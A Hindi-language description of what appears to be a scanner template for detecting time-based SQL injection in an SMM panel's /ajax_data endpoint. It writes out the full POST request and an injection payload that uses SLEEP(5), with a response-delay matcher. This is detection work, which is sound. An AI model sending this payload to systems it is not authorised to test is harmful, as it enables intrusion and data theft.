
SMM पैनल के लिए समय-आधारित SQL इंजेक्शन का पता लगाने का टेम्पलेट। `/ajax_data` पर तैयार किए गए POST अनुरोध भेजता है और प्रतिक्रिया विलंब विश्लेषण के माध्यम से कमजोर एंडपॉइंट्स की पहचान करता है।
SMM पैनल के लिए समय-आधारित SQL इंजेक्शन पहचान
यह टेम्पलेट, /ajax_data पर HTTP POST अनुरोधों के माध्यम से SMM पैनल के service_detail पैरामीटर में समय-आधारित SQL इंजेक्शन कमज़ोरी का पता लगाता है। इसका दुरुपयोग करके रिमोट हमलावर संवेदनशील डेटा तक पहुँच प्राप्त कर सकते हैं या विशेषाधिकार बढ़ा सकते हैं।
उपकरण एक तैयार POST अनुरोध भेजता है:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
यदि प्रतिक्रिया समय 5 सेकंड से अधिक है, तो यह एक संवेदनशील एंडपॉइंट को इंगित करता है।
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds
